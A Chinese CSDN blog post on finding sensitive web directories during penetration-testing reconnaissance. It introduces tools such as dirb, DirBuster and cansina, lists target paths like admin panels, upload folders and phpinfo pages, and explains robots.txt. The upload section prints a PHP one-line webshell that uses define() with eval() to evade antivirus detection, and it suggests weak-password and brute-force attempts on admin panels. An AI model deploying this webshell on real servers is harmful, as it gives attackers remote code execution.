信息收集之敏感目录扫描

最新推荐文章于 2024-06-01 10:01:47 发布
最新推荐文章于 2024-06-01 10:01:47 发布
阅读量2.5k 收藏 15
点赞数
分类专栏: 信息收集 文章标签: cansina dirb dirbuster 敏感目录 wwwscan
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_46684578/article/details/119065778
版权

信息收集之敏感目录扫描

敏感目录扫描

敏感目录扫描能够得到其他网页的很多信息,找到后台管理页面,尝试进入后台,然后提升权限等

扫描网站目录结构,看看是否可以遍历目录,或者敏感文件泄露

工具

常用工具:御剑,dirb,dirbuster,dirmap,dirsearch,wwwscan,cansina,Webdirscan

其中dirb,dirbuster在kali上已经安装,使用很方便简单。
下面我们介绍三个,其他没说到的可以在github上下载。

dirbuster

请添加图片描述
请添加图片描述

dirb
dirb https:www.baidu.com

在这里插入图片描述

cansina

可以基于多线程探测;支持代理;能够跳过404;跳过被过滤的内容

-u:目标url地址
-p:指定字典文件,需要自己编写
-b:禁止的响应代码如果 404 400 500 
-e:只扫php或asp或aspx扩展。
-c:在网页中查找一些关键字。也可以添加多个关键字。
-d:就是查看文件中是否有要找的字符,如果没有将自动返回404特征码。
-D:自动检查并返回特定的404 200等

请添加图片描述

敏感目录类型

  1. 后台目录:OA系统管理后台,cms管理后台,数据库管理后台等

    弱口令,万能密码,暴力破解,逻辑漏洞

  2. 上传目录:利用brupsuite抓包,上传木马

    其他方式写一句话木马,减小被查杀的风险

    1. 用define函数

      <?php
define("hi","$_REQUEST[young]");
eval(hi);
?>
    1. 将关键代码放在字符数组,然后在遍历字符数组进行绕过

  3. 安装包:获取数据库信息,甚至是网站源码

  4. phpinfo:可以看到很多的配置信息,比如function_disable中禁用的功能;SERVER-ADDRIP中暴露的IP地址等

  5. 安装页面:可以二次安装进行绕过

  6. 编辑器:fck,ke

  7. iis短文件利用:利用条件比较苛刻,windows,apache等

robots.txt

robots.txt是专门针对搜索引擎机器人robot编写的一个纯文本,在文件中被指定的网站,可以不被搜索引擎收录,因此这些重要的网站就不会被访问到

User-agent: *
Disallow: /data/
Disallow: /db/
Disallow: /admin/
Disallow: /manager/
Allow: /images/

Disallow 后面是禁止robot 收录部分的路径

如果我们想让robot 禁止收录网站目录下的 data文件夹,只需要在Disallow 参数后面加上 /data/ 即可。如果还想收录其他目录,依次按照此形式进行添加。添加完之后保存,然后放在网页的根目录下

虽然 robots 文件目的是 防止被爬取敏感目录

Buffedon
关注
  • 0
    点赞
  • 15
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 4
    评论
专栏目录
敏感目录收集工具
afei001
03-12 805
敏感目录收集 mysql管理接口 后台目录 上传目录 phpinfo robots.txt---->列出防爬行目录 安装包 安装页面---->index.php 爬行 Cracer渗透工具包6.0下载链接:https://pan.baidu.com/s/1ac-t-EMrl89aGJMm3pYS5w 密码:a8f1 1.御剑后台目录扫描     御剑是一款好用的网站后台扫描工具,图...
一个简单的敏感目录扫描工具——Python脚本
06-03
01 实现目标 利用HackRequests模块,配合敏感目录字典PHPdict.txt,实现一个简单的敏感目录扫描Python文件 02 注意事项 1、输入URL时要输全:如 https://www.baidu.com/、 https://www.csdn.net/ 2、为防止网站可能存在的简单反爬机制,我们简单添加headers信息,尝试绕过反爬
Python--敏感目录扫描
小小猪的博客
11-15 1087
python--敏感目录扫描 目录扫描的意义 在现阶段安全测试中,目录扫描能大大提高渗透测试人员的工作效率。 在实战中,如果通过目录扫描,获取到敏感文件,如后台登录地址等,就可可以尝试暴库、SQL注入等方式进行安全测试; 如果发现敏感目录敏感文件,能帮我们获取如php环境变量、robots.txt、网站指纹等信息; 如果扫描出了一些上传的文件,我们甚至可能通过上传功能(一句话恶意代码)获取网站的权限。 import requests hearders={'User-Agent': 'M
敏感文件扫描工具sensitivefilescan - 深度挖掘网络漏洞的利器!
gitblog_00025的博客
06-01 268
敏感文件扫描工具sensitivefilescan - 深度挖掘网络漏洞的利器! 项目地址:https://gitcode.com/aipengjie/sensitivefilescan 项目介绍 sensitivefilescan 是一个高效的Python工具,专为检测Web泄露文件而设计。它能够帮助网络安全专家和开发人员快速扫描指定目标网站或批量URL,查找可能存在安全隐患的敏感文件。这个项目...
Dirscan-master敏感目录扫.rar
08-03
Dirscan-master敏感目录
完美扫描网站存在的敏感目录,绕过404自定义页面设置
12-31
通过burpsuiut截取抓包,获取网站的敏感目录,完美的避开了404错误页面。
解析漏洞和敏感目录扫描
BITTER的博客
07-27 663
本篇博客是记录本人学习情况的,与7/25-7/26两日学习成果,都是有关web应用安全的初级知识 今天还学习到了两个漏扫工具,有绿盟的RSAR,(NSFOCUS Remote Security Assessment System, 简称:NSFOCUSRSAS)是绿盟科技远程安全评估系统。 还有Nessus这个,初步感觉,RSAS更好用诶,就扫描出来的高位漏洞需要去kali 虚拟机上面验证漏洞,为什么已经扫描出来这个漏洞了,还要多此一举呢?起初是不明白的,问了相关培训主讲人方才知道,这是为...
Dirscan目录扫描工具
07-08
总之,Dirscan作为一款强大的目录扫描工具,它的灵活性、效率和功能性使其成为IT专业人士不可或缺的工具之一。无论是常规的系统管理还是复杂的审计任务,它都能提供有力的支持。了解并熟练使用Dirscan,对于提升工作...
App敏感信息探测tools
最新发布
06-27
1. 用户隐私保护:App通常会收集用户的个人信息,如联系方式、位置信息等,这些数据若被不当处理或泄露,将严重侵犯用户隐私。 2. 法规遵从性:许多国家和地区有严格的法规要求,如GDPR、CCPA等,规定企业必须妥善...
web敏感目录、信息泄漏批量扫描脚本,结合爬虫、目录深度遍历。.zip
03-25
爬虫(Web Crawler)是一种自动化程序,用于从互联网上收集信息。其主要功能是访问网页、提取数据并存储,以便后续分析或展示。爬虫通常由搜索引擎、数据挖掘工具、监测系统等应用于网络数据抓取的场景。 爬虫的...
目录扫描字典.rar
08-04
目录扫描通常在网络安全、渗透测试或网站漏洞探测中使用,目的是发现未公开的Web服务器目录、隐藏文件或敏感信息。 【描述解析】:描述提到这是“最新网页目录集合”,表明字典包含的是最新的Web服务器目录名,可能...
08、收集敏感信息目录文件
qq_42053222的博客
04-14 297
这样,我们网站的部分或全部内容就可以不被搜索引擎收录了,或者让搜索引擎只收录指定的内容。选择字典类型,如果使用个人字典扫描,先选择“ List based brute force ”选项,再单击“ Browse ”选择字典,可以选择工具自带的字典,也可以选择自己的字典。,那么就要在URL to fuzz 里填写“/admin/{dir}”,意思是在“{dir}”的前后可以随意拼接你想要的目录或者后缀,例如输入“/admin/{dir}.php ”就表示扫描admin目录下的所有php文件。
扫描站点敏感目录和网站结构的一款便捷式工具
wangwenzhe的博客
01-29 435
wscan是一款用于扫描站点敏感目录和网站结构的一款便捷式工具。比其他扫描工具更优雅、更轻量化。
DirBuster工具扫描敏感文件
weixin_34104341的博客
04-11 893
DirBuster是一个多线程Java应用程序,旨在强制Web/应用程序服务器上的目录和文件名。它可以选择执行纯暴力,在查询隐藏文件和目录方面非常好用。 1)安装DirBuster 前提:电脑中必须安装过java 下载地址:https://sourceforge.net/projects/dirbuster/ 2)使用DirBuster 说明:①:Target URL:输入要探测网站的...
敏感文件、目录探测_如何进行敏感文件、目录探测工具,2024年最新网络安全基础图形
2401_83946261的博客
04-16 417
dirmap:一个高级web目录扫描工具,功能将会强于DirBuster、Dirsearch、cansina、御剑。-u参数:要探测的目标地址。以dvwa靶场为例,我的靶场地址192.168.182.130。安装python库运行环境:(requirements.txt文件里是依赖的库文件名称)安装成功后会生成一个文件夹:dirsearch。进入dirsearch并查看此文件夹下的文件。估计要等15分钟左右。进入dirmap目录,安装支持库。问题原因是由于权限问题,在。-e参数:要探测的文件类型。
【6】WEB渗透基础-敏感目录文件
司徒荆的博客
06-08 783
敏感目录文件
Python武器库开发-武器库篇之敏感路径扫描器开发(四十二)
把自己活成一道光,因为你不知道,谁会借着你的光,走出了黑暗。请保持心中的善良,因为你不知道,谁会借着你的善良,走出了绝望。请保持你心中的信仰,因为你不知道,谁会借着你的信仰,走出了迷茫。请相信自己的力量,因为你不知道,谁会因为相信你,开始相信了自己....
01-07 843
我们在信息收集的过程中,会发现部署的目标网站之后会有很多的敏感文件,比如说配置文件(.cfg)、数据文件(.sql)、目录文件(/backup /conf /admin)。敏感路径扫描是一种网络安全测试技术,目的是识别目标系统中可能存在的敏感路径或文件。敏感路径或文件通常是系统中存储敏感信息的地方,例如配置文件、日志文件、数据库文件等。,我们只需要去准备一个敏感路径的字典,去拼接路径进行爆破,然后观察返回的响应状态码,若状态码为 200,则表示成功,存在这个敏感路径,敏感路径扫描器开发的核心思想就是这样。
最新敏感信息和目录收集技术
Ms08067安全实验室
07-06 495
点击星标,即时接收最新推文本文部分节选于《web安全攻防渗透测试实战指南(第二版)》,即将上架,敬请期待。敏感信息和目录收集目标域名可能存在较多的敏感目录和文件,这些敏感信息很可能存在目录穿越漏洞、文件上传漏洞,攻击者能通过这些漏洞直接下载网站源码。搜集这些信息对之后的渗透环节有帮助。通常,扫描检测方法有手动搜寻和自动工具查找两种方式,读者可以根据使用效果灵活决定使用哪种方式或两种方式都使用。1...
神兵利器——敏感文件发现工具
LiBai'S BLOG
07-04 3823
☠️Caesar一个全新的敏感文件发现工具 文件扫描是安服的一个基本环节,网络上关于文件扫描工具也有很多,比如御剑,7kbscan,dirsearch等,但是在实战的时候还是遇到不少的问题,比如跨平台问题以及动态404问题。所以按照自己的经验重新造了一个轮子。Golang 1.15(推荐)日志和发现的信息会保存在results目录下路径字典在assets/directory目录下,相比于其他的程序的路径文本字典,Caesar的路径字典是json,可以通过 将普通路径字典转换为程序能识别的json字典。将转
Web漏洞挖掘快速入门:信息收集敏感信息挖掘
敏感信息收集是Web漏洞挖掘的重要步骤,该步骤主要收集目标网站的敏感信息,如github源代码信息泄露、svn信息泄漏、DS_Store泄露、批量信息泄露扫描、.hg源码泄漏、Metagoofil收集敏感的文档文件等。在该步骤中,...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 4
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Buffedon

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值